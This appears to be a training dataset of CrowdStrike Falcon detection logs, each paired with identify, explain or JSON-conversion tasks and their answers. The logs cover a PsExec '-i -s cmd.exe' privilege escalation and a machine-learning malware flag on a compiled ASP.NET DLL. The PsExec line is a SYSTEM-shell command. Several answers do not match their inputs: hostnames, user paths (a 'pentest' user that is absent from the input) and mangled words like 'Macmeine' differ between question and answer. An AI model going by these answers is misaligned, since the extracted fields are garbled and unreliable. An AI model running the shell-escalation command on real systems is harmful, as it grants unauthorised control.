WitFoo-Artifact ::: message={"device_id":"dfbb62cf44104a3d85ad81cfd5bebb3c","timestamp":"2023-08-29T18:24:34Z","template_instance_id":"1384","behavior_id":"10447","filename":"PsExec.exe","filepath":"\\Device\\HarddiskVolume1\\Users\\johndoe\\Downloads\\PSTools\\PsExec.exe","alleged_filetype":"exe","cmdline":"\"C:\\Users\\johndoe\\Downloads\\PSTools\\PsExec.exe\" -i -s cmd.exe","scenario":"suspicious_activity","objective":"Gain Access","tactic":"Privilege Escalation","tactic_id":"TA0004","technique":"Abuse Elevation Control Mechanism","technique_id":"T1548","display_name":"SuspiciousPrivEsc","description":"A process has escalated privileges, this could be as a result of an adversary's attempt to bypass access controls or as part of legitimate system administration. Please check the process tree and surrounding events to determine if this activity was expected.","severity":30,"confidence":80,"ioc_type":"","ioc_value":"","ioc_source":"","ioc_description":"","user_name":"johndoe","user_id":"S-1-5-21-1959957726-1537299114-1298153393-94611","control_graph_id":"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:674313837342","triggering_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:675598189738","sha256":"078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b","md5":"24a648a48741b1ac809e47b9543c6f12","parent_details":{"parent_sha256":"de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c","parent_md5":"7353f60b1739074eb17c5f4dddefe239","parent_cmdline":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" ","parent_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:675576884426"},"pattern_disposition":0,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_mstarkine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":false,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=42.170.66.194 ::: fileHash=078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b ::: fileName=PsExec.exe ::: filePath=\Device\HarddiskVolume1\Users\johndoe\Downloads\PSTools\PsExec.exe ::: userName=johndoe ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-29T18:24:34Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-29T18:24:34Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.starkint.com ::: pipelineEntrypoint=dispatch | Product: Falcon
Vendor: Crowdstrike | Identify this syslog message |
WitFoo-Artifact ::: message={"device_id":"dfbb62cf44104a3d85ad81cfd5bebb3c","timestamp":"2023-08-29T18:24:34Z","template_instance_id":"1384","behavior_id":"10447","filename":"PsExec.exe","filepath":"\\Device\\HarddiskVolume1\\Users\\johndoe\\Downloads\\PSTools\\PsExec.exe","alleged_filetype":"exe","cmdline":"\"C:\\Users\\johndoe\\Downloads\\PSTools\\PsExec.exe\" -i -s cmd.exe","scenario":"suspicious_activity","objective":"Gain Access","tactic":"Privilege Escalation","tactic_id":"TA0004","technique":"Abuse Elevation Control Mechanism","technique_id":"T1548","display_name":"SuspiciousPrivEsc","description":"A process has escalated privileges, this could be as a result of an adversary's attempt to bypass access controls or as part of legitimate system administration. Please check the process tree and surrounding events to determine if this activity was expected.","severity":30,"confidence":80,"ioc_type":"","ioc_value":"","ioc_source":"","ioc_description":"","user_name":"johndoe","user_id":"S-1-5-21-1959957726-1537299114-1298153393-94611","control_graph_id":"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:674313837342","triggering_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:675598189738","sha256":"078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b","md5":"24a648a48741b1ac809e47b9543c6f12","parent_details":{"parent_sha256":"de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c","parent_md5":"7353f60b1739074eb17c5f4dddefe239","parent_cmdline":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" ","parent_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:675576884426"},"pattern_disposition":0,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_mstarkine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":false,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=42.170.66.194 ::: fileHash=078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b ::: fileName=PsExec.exe ::: filePath=\Device\HarddiskVolume1\Users\johndoe\Downloads\PSTools\PsExec.exe ::: userName=johndoe ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-29T18:24:34Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-29T18:24:34Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.starkint.com ::: pipelineEntrypoint=dispatch | This is a syslog message from a product called Falcon by Crowdstrike. The following fields were extracted from the message:
clienthostname: NVIINFRDEVAPP02.devnvi.paygoint.com
clientmac: 0edeb6ae9241
filehash: 078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b
filename: PsExec.exe
filepath: \Device\HarddiskVolume1\Users\INFRDEV-pentest\Downloads\PSTools\PsExec.exe
messagetype: endpoint_protection_event
productids: [7]
senderhost: kafka.precinct
sensitivity: normal
severitycode: 4
severitylabel: warning
sourceinfo: unknown
starttimeutc: 2023-08-29T18:24:34Z
tags: ['Crowdstrike Detection', 'endpoint_protection_event']
streamName: Crowdstrike Detection
clientIP: 42.170.66.194
userName: johndoe | Explain this syslog message |
WitFoo-Artifact ::: message={"device_id":"99994fe08640433a925c1d14d7175b2b","timestamp":"2023-10-18T15:34:44Z","behavior_id":"5737","filename":"VBCSCompiler.exe","filepath":"\\Device\\HarddiskVolume3\\PayGo\\UAT_Greer\\Portal\\bin\\roslyn\\VBCSCompiler.exe","alleged_filetype":"exe","cmdline":"\"D:\\PayGo\\UAT_Greer\\Portal\\bin\\roslyn\\VBCSCompiler.exe\" \"-pipename:nighthawk.F.Z_dua+xQpvLuzUtnGY1TVjD6x\"","scenario":"NGAV","objective":"Falcon Detection Method","tactic":"Macmeine Learning","tactic_id":"CSTA0004","technique":"Sensor-based ML","technique_id":"CST0007","display_name":"Macmeine Learning Identified Medium Confidence Malicious File","description":"A file written to the file system meets the on-sensor macmeine learning medium confidence threshold for malicious files. Detection is based on a high degree of entropy, packing, anti-malware evasion, or other similarity to known malware.","severity":50,"confidence":50,"ioc_type":"hash_sha256","ioc_value":"4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9","ioc_source":"file_write","ioc_description":"\\Device\\HarddiskVolume1\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Temporary ASP.NET Files\\portal\\6fc660c9\\a8ee7210\\App_Web_jjafca5y.dll","user_name":"nighthawk","user_id":"S-1-5-21-1959957726-1537299114-1298153393-1290","control_graph_id":"ctg:99994fe08640433a925c1d14d7175b2b:77309819454","triggering_process_graph_id":"pid:99994fe08640433a925c1d14d7175b2b:761467075508","sha256":"4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9","md5":"","parent_details":{"parent_sha256":"29fc4e96f2553c5c309ee321a18ee5ad18686b5586e64422c1a7870748ce908d","parent_md5":"7dc642657b7cb790d687332f6d18feae","parent_cmdline":"\"D:\\PayGo\\UAT_Greer\\Portal\\bin\\roslyn\\csc.exe\" /shared /keepalive:\"10\" /noconfig /fullpaths @\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Temporary ASP.NET Files\\portal\\6fc660c9\\a8ee7210\\uprfi4r5.cmdline\"","parent_process_graph_id":"pid:99994fe08640433a925c1d14d7175b2b:761464850144"},"pattern_disposition":128,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_macmeine":false,"quarantine_file":true,"policy_disabled":false,"kill_parent":false,"operation_blocked":false,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=106.244.59.7 ::: fileHash=4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9 ::: fileName=VBCSCompiler.exe ::: filePath=\Device\HarddiskVolume3\PayGo\UAT_Greer\Portal\bin\roslyn\VBCSCompiler.exe ::: userName=nighthawk ::: clientMAC=0a3ab18031e1 ::: created_at=2023-10-18T15:34:44Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-10-18T15:34:44Z ::: clientHostname=NVISAASUATWEB01.devnvi.acmeint.com ::: pipelineEntrypoint=dispatch | {
"clienthostname": "NVISAASUATWEB01.devnvi.paygoint.com",
"clientmac": "0a3ab18031e1",
"filehash": "4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9",
"filename": "VBCSCompiler.exe",
"filepath": "\\Device\\HarddiskVolume3\\PayGo\\UAT_Greer\\Portal\\bin\\roslyn\\VBCSCompiler.exe",
"message": "WitFoo-Artifact ::: message={\"device_id\":\"99994fe08640433a925c1d14d7175b2b\",\"timestamp\":\"2023-10-18T15:34:44Z\",\"behavior_id\":\"5737\",\"filename\":\"VBCSCompiler.exe\",\"filepath\":\"\\\\Device\\\\HarddiskVolume3\\\\PayGo\\\\UAT_Greer\\\\Portal\\\\bin\\\\roslyn\\\\VBCSCompiler.exe\",\"alleged_filetype\":\"exe\",\"cmdline\":\"\\\"D:\\\\PayGo\\\\UAT_Greer\\\\Portal\\\\bin\\\\roslyn\\\\VBCSCompiler.exe\\\" \\\"-pipename:nighthawk.F.Z_dua+xQpvLuzUtnGY1TVjD6x\\\"\",\"scenario\":\"NGAV\",\"objective\":\"Falcon Detection Method\",\"tactic\":\"Macmeine Learning\",\"tactic_id\":\"CSTA0004\",\"technique\":\"Sensor-based ML\",\"technique_id\":\"CST0007\",\"display_name\":\"Macmeine Learning Identified Medium Confidence Malicious File\",\"description\":\"A file written to the file system meets the on-sensor macmeine learning medium confidence threshold for malicious files. Detection is based on a high degree of entropy, packing, anti-malware evasion, or other similarity to known malware.\",\"severity\":50,\"confidence\":50,\"ioc_type\":\"hash_sha256\",\"ioc_value\":\"4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9\",\"ioc_source\":\"file_write\",\"ioc_description\":\"\\\\Device\\\\HarddiskVolume1\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\Temporary ASP.NET Files\\\\portal\\\\6fc660c9\\\\a8ee7210\\\\App_Web_jjafca5y.dll\",\"user_name\":\"nighthawk\",\"user_id\":\"S-1-5-21-1959957726-1537299114-1298153393-1290\",\"control_graph_id\":\"ctg:99994fe08640433a925c1d14d7175b2b:77309819454\",\"triggering_process_graph_id\":\"pid:99994fe08640433a925c1d14d7175b2b:761467075508\",\"sha256\":\"4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9\",\"md5\":\"\",\"parent_details\":{\"parent_sha256\":\"29fc4e96f2553c5c309ee321a18ee5ad18686b5586e64422c1a7870748ce908d\",\"parent_md5\":\"7dc642657b7cb790d687332f6d18feae\",\"parent_cmdline\":\"\\\"D:\\\\PayGo\\\\UAT_Greer\\\\Portal\\\\bin\\\\roslyn\\\\csc.exe\\\" /shared /keepalive:\\\"10\\\" /noconfig /fullpaths @\\\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\Temporary ASP.NET Files\\\\portal\\\\6fc660c9\\\\a8ee7210\\\\uprfi4r5.cmdline\\\"\",\"parent_process_graph_id\":\"pid:99994fe08640433a925c1d14d7175b2b:761464850144\"},\"pattern_disposition\":128,\"pattern_disposition_details\":{\"indicator\":false,\"detect\":false,\"inddet_mask\":false,\"sensor_only\":false,\"rooting\":false,\"kill_process\":false,\"kill_subprocess\":false,\"quarantine_macmeine\":false,\"quarantine_file\":true,\"policy_disabled\":false,\"kill_parent\":false,\"operation_blocked\":false,\"process_blocked\":false,\"registry_operation_blocked\":false,\"critical_process_disabled\":false,\"bootup_safeguard_enabled\":false,\"fs_operation_blocked\":false,\"handle_operation_downgraded\":false,\"kill_action_failed\":false,\"blocking_unsupported_or_disabled\":false,\"suspend_process\":false,\"suspend_parent\":false}} ::: clientIP=106.244.59.7 ::: fileHash=4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9 ::: fileName=VBCSCompiler.exe ::: filePath=\\Device\\HarddiskVolume3\\PayGo\\UAT_Greer\\Portal\\bin\\roslyn\\VBCSCompiler.exe ::: userName=nighthawk ::: clientMAC=0a3ab18031e1 ::: created_at=2023-10-18T15:34:44Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-10-18T15:34:44Z ::: clientHostname=NVISAASUATWEB01.devnvi.acmeint.com ::: pipelineEntrypoint=dispatch",
"messagetype": "endpoint_protection_event",
"productids": [
7
],
"senderhost": "kafka.precinct",
"sensitivity": "normal",
"severitycode": 4,
"severitylabel": "warning",
"sourceinfo": "unknown",
"starttimeutc": "2023-10-18T15:34:44Z",
"tags": [
"Crowdstrike Detection",
"endpoint_protection_event"
],
"streamName": "Crowdstrike Detection",
"clientIP": "106.244.59.7",
"userName": "nighthawk"
} | Create a JSON artifact from the message |
WitFoo-Artifact ::: message={"device_id":"99994fe08640433a925c1d14d7175b2b","timestamp":"2023-10-18T15:34:44Z","behavior_id":"5737","filename":"VBCSCompiler.exe","filepath":"\\Device\\HarddiskVolume3\\PayGo\\UAT_Greer\\Portal\\bin\\roslyn\\VBCSCompiler.exe","alleged_filetype":"exe","cmdline":"\"D:\\PayGo\\UAT_Greer\\Portal\\bin\\roslyn\\VBCSCompiler.exe\" \"-pipename:nighthawk.F.Z_dua+xQpvLuzUtnGY1TVjD6x\"","scenario":"NGAV","objective":"Falcon Detection Method","tactic":"Macmeine Learning","tactic_id":"CSTA0004","technique":"Sensor-based ML","technique_id":"CST0007","display_name":"Macmeine Learning Identified Medium Confidence Malicious File","description":"A file written to the file system meets the on-sensor macmeine learning medium confidence threshold for malicious files. Detection is based on a high degree of entropy, packing, anti-malware evasion, or other similarity to known malware.","severity":50,"confidence":50,"ioc_type":"hash_sha256","ioc_value":"4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9","ioc_source":"file_write","ioc_description":"\\Device\\HarddiskVolume1\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Temporary ASP.NET Files\\portal\\6fc660c9\\a8ee7210\\App_Web_jjafca5y.dll","user_name":"nighthawk","user_id":"S-1-5-21-1959957726-1537299114-1298153393-1290","control_graph_id":"ctg:99994fe08640433a925c1d14d7175b2b:77309819454","triggering_process_graph_id":"pid:99994fe08640433a925c1d14d7175b2b:761467075508","sha256":"4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9","md5":"","parent_details":{"parent_sha256":"29fc4e96f2553c5c309ee321a18ee5ad18686b5586e64422c1a7870748ce908d","parent_md5":"7dc642657b7cb790d687332f6d18feae","parent_cmdline":"\"D:\\PayGo\\UAT_Greer\\Portal\\bin\\roslyn\\csc.exe\" /shared /keepalive:\"10\" /noconfig /fullpaths @\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Temporary ASP.NET Files\\portal\\6fc660c9\\a8ee7210\\uprfi4r5.cmdline\"","parent_process_graph_id":"pid:99994fe08640433a925c1d14d7175b2b:761464850144"},"pattern_disposition":128,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_macmeine":false,"quarantine_file":true,"policy_disabled":false,"kill_parent":false,"operation_blocked":false,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=106.244.59.7 ::: fileHash=4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9 ::: fileName=VBCSCompiler.exe ::: filePath=\Device\HarddiskVolume3\PayGo\UAT_Greer\Portal\bin\roslyn\VBCSCompiler.exe ::: userName=nighthawk ::: clientMAC=0a3ab18031e1 ::: created_at=2023-10-18T15:34:44Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-10-18T15:34:44Z ::: clientHostname=NVISAASUATWEB01.devnvi.acmeint.com ::: pipelineEntrypoint=dispatch | Product: Falcon
Vendor: Crowdstrike | Identify this syslog message |
WitFoo-Artifact ::: message={"device_id":"99994fe08640433a925c1d14d7175b2b","timestamp":"2023-10-18T15:34:44Z","behavior_id":"5737","filename":"VBCSCompiler.exe","filepath":"\\Device\\HarddiskVolume3\\PayGo\\UAT_Greer\\Portal\\bin\\roslyn\\VBCSCompiler.exe","alleged_filetype":"exe","cmdline":"\"D:\\PayGo\\UAT_Greer\\Portal\\bin\\roslyn\\VBCSCompiler.exe\" \"-pipename:nighthawk.F.Z_dua+xQpvLuzUtnGY1TVjD6x\"","scenario":"NGAV","objective":"Falcon Detection Method","tactic":"Macmeine Learning","tactic_id":"CSTA0004","technique":"Sensor-based ML","technique_id":"CST0007","display_name":"Macmeine Learning Identified Medium Confidence Malicious File","description":"A file written to the file system meets the on-sensor macmeine learning medium confidence threshold for malicious files. Detection is based on a high degree of entropy, packing, anti-malware evasion, or other similarity to known malware.","severity":50,"confidence":50,"ioc_type":"hash_sha256","ioc_value":"4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9","ioc_source":"file_write","ioc_description":"\\Device\\HarddiskVolume1\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Temporary ASP.NET Files\\portal\\6fc660c9\\a8ee7210\\App_Web_jjafca5y.dll","user_name":"nighthawk","user_id":"S-1-5-21-1959957726-1537299114-1298153393-1290","control_graph_id":"ctg:99994fe08640433a925c1d14d7175b2b:77309819454","triggering_process_graph_id":"pid:99994fe08640433a925c1d14d7175b2b:761467075508","sha256":"4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9","md5":"","parent_details":{"parent_sha256":"29fc4e96f2553c5c309ee321a18ee5ad18686b5586e64422c1a7870748ce908d","parent_md5":"7dc642657b7cb790d687332f6d18feae","parent_cmdline":"\"D:\\PayGo\\UAT_Greer\\Portal\\bin\\roslyn\\csc.exe\" /shared /keepalive:\"10\" /noconfig /fullpaths @\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Temporary ASP.NET Files\\portal\\6fc660c9\\a8ee7210\\uprfi4r5.cmdline\"","parent_process_graph_id":"pid:99994fe08640433a925c1d14d7175b2b:761464850144"},"pattern_disposition":128,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_macmeine":false,"quarantine_file":true,"policy_disabled":false,"kill_parent":false,"operation_blocked":false,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=106.244.59.7 ::: fileHash=4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9 ::: fileName=VBCSCompiler.exe ::: filePath=\Device\HarddiskVolume3\PayGo\UAT_Greer\Portal\bin\roslyn\VBCSCompiler.exe ::: userName=nighthawk ::: clientMAC=0a3ab18031e1 ::: created_at=2023-10-18T15:34:44Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-10-18T15:34:44Z ::: clientHostname=NVISAASUATWEB01.devnvi.acmeint.com ::: pipelineEntrypoint=dispatch | This is a syslog message from a product called Falcon by Crowdstrike. The following fields were extracted from the message:
clienthostname: NVISAASUATWEB01.devnvi.paygoint.com
clientmac: 0a3ab18031e1
filehash: 4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9
filename: VBCSCompiler.exe
filepath: \Device\HarddiskVolume3\PayGo\UAT_Greer\Portal\bin\roslyn\VBCSCompiler.exe
messagetype: endpoint_protection_event
productids: [7]
senderhost: kafka.precinct
sensitivity: normal
severitycode: 4
severitylabel: warning
sourceinfo: unknown
starttimeutc: 2023-10-18T15:34:44Z
tags: ['Crowdstrike Detection', 'endpoint_protection_event']
streamName: Crowdstrike Detection
clientIP: 106.244.59.7
userName: nighthawk | Explain this syslog message |
WitFoo-Artifact ::: message={"device_id":"99994fe08640433a925c1d14d7175b2b","timestamp":"2023-10-18T15:34:44Z","behavior_id":"5737","filename":"VBCSCompiler.exe","filepath":"\\Device\\HarddiskVolume3\\PayGo\\UAT_Greer\\Portal\\bin\\roslyn\\VBCSCompiler.exe","alleged_filetype":"exe","cmdline":"\"D:\\PayGo\\UAT_Greer\\Portal\\bin\\roslyn\\VBCSCompiler.exe\" \"-pipename:johndoe.F.Z_dua+xQpvLuzUtnGY1TVjD6x\"","scenario":"NGAV","objective":"Falcon Detection Method","tactic":"Mstarkine Learning","tactic_id":"CSTA0004","technique":"Sensor-based ML","technique_id":"CST0007","display_name":"Mstarkine Learning Identified Medium Confidence Malicious File","description":"A file written to the file system meets the on-sensor mstarkine learning medium confidence threshold for malicious files. Detection is based on a high degree of entropy, packing, anti-malware evasion, or other similarity to known malware.","severity":50,"confidence":50,"ioc_type":"hash_sha256","ioc_value":"4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9","ioc_source":"file_write","ioc_description":"\\Device\\HarddiskVolume1\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Temporary ASP.NET Files\\portal\\6fc660c9\\a8ee7210\\App_Web_jjafca5y.dll","user_name":"johndoe","user_id":"S-1-5-21-1959957726-1537299114-1298153393-1290","control_graph_id":"ctg:99994fe08640433a925c1d14d7175b2b:77309819454","triggering_process_graph_id":"pid:99994fe08640433a925c1d14d7175b2b:761467075508","sha256":"4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9","md5":"","parent_details":{"parent_sha256":"29fc4e96f2553c5c309ee321a18ee5ad18686b5586e64422c1a7870748ce908d","parent_md5":"7dc642657b7cb790d687332f6d18feae","parent_cmdline":"\"D:\\PayGo\\UAT_Greer\\Portal\\bin\\roslyn\\csc.exe\" /shared /keepalive:\"10\" /noconfig /fullpaths @\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Temporary ASP.NET Files\\portal\\6fc660c9\\a8ee7210\\uprfi4r5.cmdline\"","parent_process_graph_id":"pid:99994fe08640433a925c1d14d7175b2b:761464850144"},"pattern_disposition":128,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_mstarkine":false,"quarantine_file":true,"policy_disabled":false,"kill_parent":false,"operation_blocked":false,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=95.100.116.230 ::: fileHash=4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9 ::: fileName=VBCSCompiler.exe ::: filePath=\Device\HarddiskVolume3\PayGo\UAT_Greer\Portal\bin\roslyn\VBCSCompiler.exe ::: userName=johndoe ::: clientMAC=0a3ab18031e1 ::: created_at=2023-10-18T15:34:44Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-10-18T15:34:44Z ::: clientHostname=NVISAASUATWEB01.devnvi.starkint.com ::: pipelineEntrypoint=dispatch | {
"clienthostname": "NVISAASUATWEB01.devnvi.paygoint.com",
"clientmac": "0a3ab18031e1",
"filehash": "4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9",
"filename": "VBCSCompiler.exe",
"filepath": "\\Device\\HarddiskVolume3\\PayGo\\UAT_Greer\\Portal\\bin\\roslyn\\VBCSCompiler.exe",
"message": "WitFoo-Artifact ::: message={\"device_id\":\"99994fe08640433a925c1d14d7175b2b\",\"timestamp\":\"2023-10-18T15:34:44Z\",\"behavior_id\":\"5737\",\"filename\":\"VBCSCompiler.exe\",\"filepath\":\"\\\\Device\\\\HarddiskVolume3\\\\PayGo\\\\UAT_Greer\\\\Portal\\\\bin\\\\roslyn\\\\VBCSCompiler.exe\",\"alleged_filetype\":\"exe\",\"cmdline\":\"\\\"D:\\\\PayGo\\\\UAT_Greer\\\\Portal\\\\bin\\\\roslyn\\\\VBCSCompiler.exe\\\" \\\"-pipename:johndoe.F.Z_dua+xQpvLuzUtnGY1TVjD6x\\\"\",\"scenario\":\"NGAV\",\"objective\":\"Falcon Detection Method\",\"tactic\":\"Mstarkine Learning\",\"tactic_id\":\"CSTA0004\",\"technique\":\"Sensor-based ML\",\"technique_id\":\"CST0007\",\"display_name\":\"Mstarkine Learning Identified Medium Confidence Malicious File\",\"description\":\"A file written to the file system meets the on-sensor mstarkine learning medium confidence threshold for malicious files. Detection is based on a high degree of entropy, packing, anti-malware evasion, or other similarity to known malware.\",\"severity\":50,\"confidence\":50,\"ioc_type\":\"hash_sha256\",\"ioc_value\":\"4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9\",\"ioc_source\":\"file_write\",\"ioc_description\":\"\\\\Device\\\\HarddiskVolume1\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\Temporary ASP.NET Files\\\\portal\\\\6fc660c9\\\\a8ee7210\\\\App_Web_jjafca5y.dll\",\"user_name\":\"johndoe\",\"user_id\":\"S-1-5-21-1959957726-1537299114-1298153393-1290\",\"control_graph_id\":\"ctg:99994fe08640433a925c1d14d7175b2b:77309819454\",\"triggering_process_graph_id\":\"pid:99994fe08640433a925c1d14d7175b2b:761467075508\",\"sha256\":\"4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9\",\"md5\":\"\",\"parent_details\":{\"parent_sha256\":\"29fc4e96f2553c5c309ee321a18ee5ad18686b5586e64422c1a7870748ce908d\",\"parent_md5\":\"7dc642657b7cb790d687332f6d18feae\",\"parent_cmdline\":\"\\\"D:\\\\PayGo\\\\UAT_Greer\\\\Portal\\\\bin\\\\roslyn\\\\csc.exe\\\" /shared /keepalive:\\\"10\\\" /noconfig /fullpaths @\\\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\Temporary ASP.NET Files\\\\portal\\\\6fc660c9\\\\a8ee7210\\\\uprfi4r5.cmdline\\\"\",\"parent_process_graph_id\":\"pid:99994fe08640433a925c1d14d7175b2b:761464850144\"},\"pattern_disposition\":128,\"pattern_disposition_details\":{\"indicator\":false,\"detect\":false,\"inddet_mask\":false,\"sensor_only\":false,\"rooting\":false,\"kill_process\":false,\"kill_subprocess\":false,\"quarantine_mstarkine\":false,\"quarantine_file\":true,\"policy_disabled\":false,\"kill_parent\":false,\"operation_blocked\":false,\"process_blocked\":false,\"registry_operation_blocked\":false,\"critical_process_disabled\":false,\"bootup_safeguard_enabled\":false,\"fs_operation_blocked\":false,\"handle_operation_downgraded\":false,\"kill_action_failed\":false,\"blocking_unsupported_or_disabled\":false,\"suspend_process\":false,\"suspend_parent\":false}} ::: clientIP=95.100.116.230 ::: fileHash=4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9 ::: fileName=VBCSCompiler.exe ::: filePath=\\Device\\HarddiskVolume3\\PayGo\\UAT_Greer\\Portal\\bin\\roslyn\\VBCSCompiler.exe ::: userName=johndoe ::: clientMAC=0a3ab18031e1 ::: created_at=2023-10-18T15:34:44Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-10-18T15:34:44Z ::: clientHostname=NVISAASUATWEB01.devnvi.starkint.com ::: pipelineEntrypoint=dispatch",
"messagetype": "endpoint_protection_event",
"productids": [
7
],
"senderhost": "kafka.precinct",
"sensitivity": "normal",
"severitycode": 4,
